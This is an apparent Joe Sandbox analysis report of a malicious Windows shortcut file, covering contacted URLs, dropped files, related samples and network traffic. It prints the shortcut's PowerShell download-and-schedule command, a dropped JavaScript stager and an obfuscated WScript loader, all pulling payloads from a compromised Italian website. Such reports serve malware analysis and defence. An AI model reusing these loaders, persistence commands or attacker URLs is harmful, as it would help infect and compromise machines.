                                    		unknown
                                    https://aka.ms/pscore68powershell.exe, 00000000.00000002.1355313472.00000207AC031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022850A51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C31F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4CEA71000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.italialife24.it/wp-content/uploads/2021/05/awscript.exe, 00000018.00000003.2276654785.000001D168012000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000002.2279915971.000001D168012000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2276802574.000001D168012000.00000004.00000020.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1wscript.exe, 0000001C.00000002.2338052164.000001F1B4090000.00000004.00000020.00020000.00000000.sdmp, NDU462JA8L5M.js.12.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1355313472.00000207AC031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022850A51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C31F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4CEA71000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.italialife24.it/wp-cwscript.exe, 0000000F.00000002.1413160775.000001FB698A5000.00000004.00000020.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://oneget.orgpowershell.exe, 00000000.00000002.1355313472.00000207AD785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022852096000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C4836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D00B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://italialife24.itpowershell.exe, 00000000.00000002.1355313472.00000207AD67C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1355313472.00000207AD6E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022852029000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C47CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D004B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.italialife24.itpowershell.exe, 00000000.00000002.1355313472.00000207AD67C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1355313472.00000207AD6E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022852029000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C47CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D004B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxh2dz.phppowershell.exe, 00000000.00000002.1354882040.00000207AA335000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            46.254.34.201
                                            		italialife24.itItaly
                                            		52030SERVERPLAN-ASITtrue

                                            General Information

                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1567191
                                            Start date and time:2024-12-03 09:14:08 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 5m 35s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:30
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:yT6gJFN0SR.lnk
                                            renamed because original name is a hash value
                                            Original Sample Name:d480330c8ee5ab7fb143c23321531474b736e7cca9abe933da41b2fe2472863c.lnk
                                            Detection:MAL
                                            Classification:mal100.expl.evad.winLNK@28/13@1/1
                                            EGA Information:Failed
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 7
                                            • Number of non-executed functions: 4
                                            Cookbook Comments:
                                            • Found application associated with file extension: .lnk

                                            Warnings

                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target powershell.exe, PID 6652 because it is empty
                                            • Execution Graph export aborted for target powershell.exe, PID 7428 because it is empty
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • VT rate limit hit for: yT6gJFN0SR.lnk

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            03:15:04API Interceptor119x Sleep call for process: powershell.exe modified
                                            09:15:11Task SchedulerRun new task: e0OvtdEL8 path: wscript s>C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            46.254.34.201http://bellantonicioccolato.it/wp-content/uploads/2020/11/gutweedtE.exeGet hashmaliciousUnknownBrowse
                                            • bellantonicioccolato.it/wp-content/uploads/2020/11/gutweedtE.exe

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            SERVERPLAN-ASIT6K2g0GMmIE.lnkGet hashmaliciousUnknownBrowse
                                            • 46.254.34.201
                                            G9eWTvswoH.lnkGet hashmaliciousUnknownBrowse
                                            • 46.254.34.201
                                            la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                            • 193.70.147.14
                                            Ordine Electricas BC Corp PO EDC0969388.batGet hashmaliciousGuLoaderBrowse
                                            • 185.81.4.143
                                            Play_VM-Now(Gdunphy)CQDM.htmGet hashmaliciousUnknownBrowse
                                            • 93.95.216.8
                                            Steel Dynamics.pdfGet hashmaliciousUnknownBrowse
                                            • 93.95.216.8
                                            citibank_0824_statement.lnkGet hashmaliciousUnknownBrowse
                                            • 46.254.34.201
                                            https://www.bellantonicioccolato.it/wp-content/uploads/2020/11/gutweedtE.exeGet hashmaliciousKoiLoaderBrowse
                                            • 46.254.34.201
                                            http://bellantonicioccolato.it/wp-content/uploads/2020/11/gutweedtE.exeGet hashmaliciousUnknownBrowse
                                            • 46.254.34.201
                                            https://www.baidu.com/link?url=PR7h_t_ZizoWZdjSMLubWVmCX_p6239c2z0KzH4cKS_&wd=ZC5rZW5uZWR5QGNoY2ZsLm9yZw==Get hashmaliciousUnknownBrowse
                                            • 46.254.36.239

                                            JA3 Fingerprints

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            3b5074b1b5d032e5620f69f9f700ff0e6K2g0GMmIE.lnkGet hashmaliciousUnknownBrowse
                                            • 46.254.34.201
                                            G9eWTvswoH.lnkGet hashmaliciousUnknownBrowse
                                            • 46.254.34.201
                                            INTRUM65392.pdf.lnkGet hashmaliciousUnknownBrowse
                                            • 46.254.34.201
                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                            • 46.254.34.201
                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                            • 46.254.34.201
                                            P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 46.254.34.201
                                            https://Lakeheadu.hlov.de/Szii3aFWcmivgihoevuc/trTlqgskL4/K3qRQz5Ggziclxgen/t3JiPvu/Szii3aFWcmivgihoevuc/Advising/YSxMdD/lakeheadu.ca/Szii3aFWcmivgihoevucGet hashmaliciousHTMLPhisherBrowse
                                            • 46.254.34.201
                                            http://www.abvt.com.au/netsuite-userGet hashmaliciousUnknownBrowse
                                            • 46.254.34.201
                                            http://www.abvt.com.au/netsuite-userGet hashmaliciousUnknownBrowse
                                            • 46.254.34.201
                                            file.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                            • 46.254.34.201

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\ProgramData\NDU462JA8L5M.js

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with very long lines (398)
                                            Category:dropped
                                            Size (bytes):1288
                                            Entropy (8bit):5.725267952895809
                                            Encrypted:false
                                            SSDEEP:24:iJr+PoLb+CIzf5j1MVL+kUE+QQAVl/sqQ1cEE2Rgjzku/uN:ErK0KZVjSVCRH2lnMbl+Eu/uN
                                            MD5:601FCB25B7FCFC2493B8347F1CC2C95E
                                            SHA1:EEBD8760BED3892FA439BA696BEA16A7DE2447E1
                                            SHA-256:4BFAB7DBCCDFCA0F592618EB7C865619E81FA3088146B0D6FC262AE418E4F53C
                                            SHA-512:4F3D9BFECFC79149CC622AD67AE40DAF3A80C14CF014493854C44C3433F1A2EC75B34000EAE3E1DF80712EF12B894C450224FE44D58C6D079C35EA618B916608
                                            Malicious:false
                                            Preview:var f1="Scr",f2="ing.Fi",f3="stemOb".var fso = new ActiveXObject(f1+"ipt"+f2+"leSy"+f3+"ject").var w1="WSc",w2="riPt",w4="eLl".var wsh=w1+w2+".sH"+w4.var bbj=new ActiveXObject(wsh).var fldr=GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'").AddressWidth==64?"SysWOW64":"System32".var rd=bbj.ExpandEnvironmentStrings("%SYSTEMROOT%")+"\\"+fldr+"\\WindowsPowerShell\\v1.0\\powershell.exe".var agn='r'+bbj.RegRead('HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid')+'r.js'.if (WScript.ScriptName != agn) {..var fs5="yFi"..try {..fso["Cop"+fs5+"le"](WScript.ScriptFullName, bbj.ExpandEnvironmentStrings("%programdata%")+"\\"+agn)..} catch (e) {}.}.var mtx_name="7zFEPMR8R5JM".var mtx_file = bbj.ExpandEnvironmentStrings("%t"+"emp%")+"\\"+mtx_name.var fs1="leteFi".var fs2="leExis".try {..fso["De"+fs1+"le"](mtx_file).} catch (e) {}.if (!fso["Fi"+fs2+"ts"](mtx_file)).{..bbj.Run(rd+" -command \"$l1 = 'https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php'; $l2 = 'ht

                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):64
                                            Entropy (8bit):0.34726597513537405
                                            Encrypted:false
                                            SSDEEP:3:Nlll:Nll
                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                            Malicious:false
                                            Preview:@...e...........................................................

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4l3cetix.htr.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aspxuzhl.pkd.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cuf5hhli.zqz.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_goh4mvnq.uuo.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ixtlxc5b.imn.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lt0wqamh.l4h.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u0mxhpsr.ain.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z0wtyxfu.ek2.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\epZTzlYAtsWrS0.js

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):304
                                            Entropy (8bit):5.389083644060431
                                            Encrypted:false
                                            SSDEEP:6:qcYrhvmVs8Gz797cfoKgEFULvrlAZ9HFiVu5h3BbRnK6U:HYrhvF8879qoZsirauIBbRnDU
                                            MD5:902D822E01B69F5C888C532E2DA59CEF
                                            SHA1:147B63087E5A2F699D400415DD74FBEEDBFB6B1F
                                            SHA-256:558678AF210925EDB28A5EF2DE95B4FC78D0D588749DD6194567850C5154B61E
                                            SHA-512:2431832BCC697DCFEC277F039E66809FBAA17082F2EF2272EB6786D5E7AD1F62D59D61AB4A8A06B44271D4F8F8C0D7F29F68C36AC4420884FE68A5040CD5954A
                                            Malicious:false
                                            Preview:var fnn = new ActiveXObject("WScript.Shell")..fnn.Run("powershell -command \"IWR -outfi $env:programdata\\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn " + WScript.arguments(0) + " /f; wscript $env:programdata\\NDU462JA8L5M.js \"", 0)

                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GTQLE48L41EUFM4ZQLOG.temp

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):5398
                                            Entropy (8bit):3.5022281177226664
                                            Encrypted:false
                                            SSDEEP:48:rhrD2dLXuHWJIJlAh/WPXdl64SogZoEJdJagh/WPXdlJ4SogZoEJdJO1:rhWuohe/dQHlhe/d5HC
                                            MD5:6100940A4F606D76B0F3647181055D36
                                            SHA1:DEB567AD2D29DB97FE1CB0723E87EF7FED75213C
                                            SHA-256:8CC71F9C7321FD41C09B145DD5E32FCBDA73FD03EF531E12E9C2BEB3BAA38E69
                                            SHA-512:CFDCE411D4EE1C1C6253D9EEF3CC8D2BF3131B5A1217A1AC291FD10FE3D2ED95A90AD90E24D2814A1C9386E0A90C6A2B1FCB5C888374A4406D571218009629D8
                                            Malicious:false
                                            Preview:...................................FL..................F.`.. ....s.0a...<..t[E....ks[E..q............................P.O. .:i.....+00.:...:..,.LB.)...A&...&........*_....."2a...<..t[E....j.2.q....Y.A .YT6GJF~1.LNK..N......EW.>.Y.A..............................y.T.6.g.J.F.N.0.S.R...l.n.k.......X...............-.......W.............h......C:\Users\user\Desktop\yT6gJFN0SR.lnk..<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.........%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe...........................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.............................................................................................................

                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\be35910bcc426105.customDestinations-ms (copy)

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):5398
                                            Entropy (8bit):3.5022281177226664
                                            Encrypted:false
                                            SSDEEP:48:rhrD2dLXuHWJIJlAh/WPXdl64SogZoEJdJagh/WPXdlJ4SogZoEJdJO1:rhWuohe/dQHlhe/d5HC
                                            MD5:6100940A4F606D76B0F3647181055D36
                                            SHA1:DEB567AD2D29DB97FE1CB0723E87EF7FED75213C
                                            SHA-256:8CC71F9C7321FD41C09B145DD5E32FCBDA73FD03EF531E12E9C2BEB3BAA38E69
                                            SHA-512:CFDCE411D4EE1C1C6253D9EEF3CC8D2BF3131B5A1217A1AC291FD10FE3D2ED95A90AD90E24D2814A1C9386E0A90C6A2B1FCB5C888374A4406D571218009629D8
                                            Malicious:false
                                            Preview:...................................FL..................F.`.. ....s.0a...<..t[E....ks[E..q............................P.O. .:i.....+00.:...:..,.LB.)...A&...&........*_....."2a...<..t[E....j.2.q....Y.A .YT6GJF~1.LNK..N......EW.>.Y.A..............................y.T.6.g.J.F.N.0.S.R...l.n.k.......X...............-.......W.............h......C:\Users\user\Desktop\yT6gJFN0SR.lnk..<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.........%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe...........................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.............................................................................................................

                                            Static File Info

                                            General

                                            File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=11, Archive, ctime=Mon Apr 8 20:19:11 2024, mtime=Tue Nov 26 15:01:54 2024, atime=Mon Apr 8 20:19:11 2024, length=455680, window=hidenormalshowminimized
                                            Entropy (8bit):3.3754418958726147
                                            TrID:
                                            • Windows Shortcut (20020/1) 100.00%
                                            File name:yT6gJFN0SR.lnk
                                            File size:3'953 bytes
                                            MD5:a8adbb0f006cbb7a70d7c2dcb0e2cff6
                                            SHA1:38f9fbf5a68943dc8f265191bb302722afed95d7
                                            SHA256:d480330c8ee5ab7fb143c23321531474b736e7cca9abe933da41b2fe2472863c
                                            SHA512:97686340a9b30c0516f8f7ac76a19a6547a6e407588dca5ac042ac767af0c57560059457e8042ccb2d3a031637d5ebd2d299e14446c6e0768c5cae75c1ae45fb
                                            SSDEEP:48:8Yk110gZ1sAT1IUPKrb4ytbRVMXsEbS0A4DgdoITXuHhKA:8Yk12msEIBv4yJQcCA4DRauB
                                            TLSH:A881CE202BF50758F6F38F3EA8BBB21259BF7955DD21CA8D10A0424C0872A15D976F7B
                                            File Content Preview:L..................F.B.. .....qf.........@..N.rf.................................P.O. .:i.....+00.../C:\...................V.1.....sY....Windows.@........OwHzYD}.... .......................7.W.i.n.d.o.w.s.....Z.1.....zY+n..System32..B........OwHzY........

                                            File Icon

                                            Icon Hash:72d282828e8d8dd5

                                            Static Windows Shortcut Info

                                            General

                                            Relative Path:..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Command Line Argument: -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;
                                            Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                            Network Behavior

                                            Suricata IDS Alerts

                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                            2024-12-03T09:15:10.115267+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.74970046.254.34.201443TCP

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Dec 3, 2024 09:15:05.585757971 CET49699443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:15:05.585788012 CET4434969946.254.34.201192.168.2.7
                                            Dec 3, 2024 09:15:05.585875034 CET49699443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:15:05.593961000 CET49699443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:15:05.593972921 CET4434969946.254.34.201192.168.2.7
                                            Dec 3, 2024 09:15:07.280833960 CET4434969946.254.34.201192.168.2.7
                                            Dec 3, 2024 09:15:07.280942917 CET49699443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:15:07.294326067 CET49699443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:15:07.294344902 CET4434969946.254.34.201192.168.2.7
                                            Dec 3, 2024 09:15:07.294543028 CET4434969946.254.34.201192.168.2.7
                                            Dec 3, 2024 09:15:07.321310043 CET49699443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:15:07.363333941 CET4434969946.254.34.201192.168.2.7
                                            Dec 3, 2024 09:15:07.831862926 CET4434969946.254.34.201192.168.2.7
                                            Dec 3, 2024 09:15:07.831940889 CET4434969946.254.34.201192.168.2.7
                                            Dec 3, 2024 09:15:07.832043886 CET49699443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:15:07.836704016 CET49699443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:15:07.840990067 CET49700443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:15:07.841027975 CET4434970046.254.34.201192.168.2.7
                                            Dec 3, 2024 09:15:07.841133118 CET49700443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:15:07.841315985 CET49700443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:15:07.841334105 CET4434970046.254.34.201192.168.2.7
                                            Dec 3, 2024 09:15:09.557420015 CET4434970046.254.34.201192.168.2.7
                                            Dec 3, 2024 09:15:09.560053110 CET49700443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:15:09.560076952 CET4434970046.254.34.201192.168.2.7
